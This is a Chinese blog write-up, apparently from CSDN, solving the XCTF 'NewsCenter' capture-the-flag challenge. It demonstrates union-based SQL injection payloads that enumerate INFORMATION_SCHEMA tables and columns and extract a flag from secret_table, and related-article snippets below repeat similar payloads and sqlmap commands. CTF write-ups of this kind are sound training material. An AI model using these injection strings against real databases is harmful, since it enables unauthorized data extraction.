XCTF-NewsCenter(SQL注入解析)

最新推荐文章于 2023-01-12 11:43:36 发布
最新推荐文章于 2023-01-12 11:43:36 发布
阅读量1k 收藏
点赞数 1
分类专栏: ctf 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44823018/article/details/103931520
版权

这是一道关于SQL注入的题目。

首先打开题目网站发现是一个新闻查询界面
在这里插入图片描述
我们先测试一下有没有sql注入漏洞
在这里插入图片描述
明显是有的,现在就可以猜测列的数量了,经过多次测试,最多是三列。

所以现在开始爆破表的名字:

1union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES #

在这里插入图片描述
发现有一个secret_table,猜测flag在里面

接下来继续爆破字段名:

1union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’secret_table’#

在这里插入图片描述
可知fl4g就是flag了,现在直接查找该字段内容

构建注入:1′ union select 1,2,fl4g from secret_table#
在这里插入图片描述
得到flag。

差不多就这样啦!有问题的话请告诉博主,我会改的,大家一起进步!

Uranusky_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XCTF:NewsCenter
m0_64898960的博客
03-18 4100
xctf 因为有输入框,我习惯初步判断它为sql注入 1.测试是否存在注入点,输入 1' 结果报错了,然后尝试 1" 2.知道存在注入,且为字符型注入。然后进行字段数猜测 直到字段数为4开始报错 3.尝试获得显示位 4.查库名 5.查表名 6.查列名 7.获取flag 到这里本题就已经解出来了,下面是我在上面用到的sql语句。 1' 1" 1'order by 1# -1'union select 1,2,3# -1'uni...
XCTF_NewsCenter
TA不懒,但还没有添加简介
01-17 2972
XCTF_NewsCenter
攻防世界XCTFNewsCenter
末初的CSDN博客
03-06 403
这道题是一个非常简单的sql注入 ’ and 1=1#回显正常,’ and 1=2#回显不正常。即可判断存在sql注入。 接着查看,这张表有几个字段,'order by 3#正常,'order by 4#报错,判断存在3个字段。 联合查询,发现2,3这两个字段存在回显。 查询版本和当前连接的数据库 查询当前用户和所有数据库 查表名 查字段 获取字段内容 ...
[wp]xctf newscenter
lonmar的博客
03-08 237
查询所有数据库名称和表名 ’ union select 1,table_schema,table_name from information_schema.tables# 发现就两个数据库information_schema与news 查询news数据库中的表的名称 ’ union select 1,table_schema,table_name from information_schem...
xctf-web-NewsCenter
Spwpun的博客
03-30 2251
一个无报错回显的注入漏洞,明明一个很简单的sql注入题,我却花一个小时来做,服了自己了,依赖于sqlmap我从来没尝到甜头过,还是得对information_schema表结构有一定的理解: 查询当前数据库中的所有表名: 1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_...
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-RE】新手练习区-csaw2013reversing2.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ova41g
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
NewsCenter
06-23
自己做的系统,运行没什么问题,页面不是很多,主要有有添加新闻、删除新闻、查看新闻、修改新闻等操作。是三层架构。
XCTFNewsCenter
Keepb1ue的博客
01-12 1633
一道简单的常规注入题
XCTF NewsCenter wp
weixin_45253216的博客
01-08 344
2021.1.8 网安菜鸡今天来划水了! 很久以前的一道题,因为打开环境一直出错,所以一直拖到现在。CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 打开环境,是一个搜索页面,有一个Search News的搜索框,盲猜sql注入。 在搜索框输入搜索内容,url不变,所以应该是post注入。话不多说,sqlmap安排! First:sqlmap进行POST注入的两种方式 可能有3,4,5种,能力有限,先学两个 方法一:自动搜索表
XCTF-高手进阶区:NewsCenter
1stPeak's Blog
06-13 3195
XCTF-高手进阶区:NewsCenter
XCTF web NewsCentersqlmap简单使用)
H4ppyD0g的博客
09-12 750
打开网页是一个查询操作的输入框,判断应该存在sql注入。 随便输入一些东西后回车,用bp抓包,抓取的内容放到一个1.txt文件里面 之后用到sqlmap sqlmap.py -r 1.txt --dbs 用1.txt内容去搜索对应的所有数据库名 可以爆出两个库 sqlmap.py -r 1.txt -D news --dump 建立可后台news库连接, 搜索所有的数据 sql部分常用参数 ...
2020.3.29 xctf(NewsCenter)①
DSR446的博客
03-29 421
打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入 这里我们介绍两种手动和sqlmap ①手动测: 我们这里先用order by 手动测字段数,发现当4的时候页面就不能正常显示了,所以这里应该是3。 查询当前数据库中的所有表名: 1' union select 1,2,group_concat(table_name) from information_schema.tables where ...
XCTF-攻防世界CTF平台-Web类——7、NewsCenterSQL注入
Onlyone_1314的博客
11-19 1745
目录标题手工注入information_schema.columns 学习sqlmap工具注入: 打开题目地址: 只有一个搜索框,下面是几条消息,上面输入关键词可以搜索这几条消息,可能就是存在SQL注入漏洞: 在后面加入’ or '1 = 1恒成立的判定条件: a ' or '1 = 1 搜索结果变成了所有的消息,应该就是存在SQL注入 手工注入 之后我们在后面拼接order by,来查看表中有多少列,查询结果按照前1列排序(第一个’闭合后台命令的第一个’,#注释掉后台的第二个’): ' order
Xctf练习sql注入--supersqli
weixin_45694388的博客
12-28 257
三种方法 方法一 =1 回显正常 =1’回显不正常,报sql语法错误 =1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用) =1’ order by 3 --+ 回显失败,说明有2个注入点 =1’ union select 1,2 --+ 回显显示过滤语句: =1’; show databases --+ 爆数据库名 =-1’; show tables --+ 绕过过滤,显示表下的列名 =1’;show columns from words --+ 尝试堆叠
XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
MJosek博客
03-23 1204
题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1 我们进入页面 观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法 首先我们页面的post请求进行抓包操作 ...
CTF-WEB入门指南:技能、资源与漏洞解析
此外,还提到了一系列的基础漏洞类型,如SQL注入、文件上传、XSS、SSRF等,以及相关的工具,如虚拟机、抓包工具和服务器管理工具。文档还鼓励学习者利用GitHub等资源进行自我学习,并介绍了几个靶场平台供实践使用。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Uranusky_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值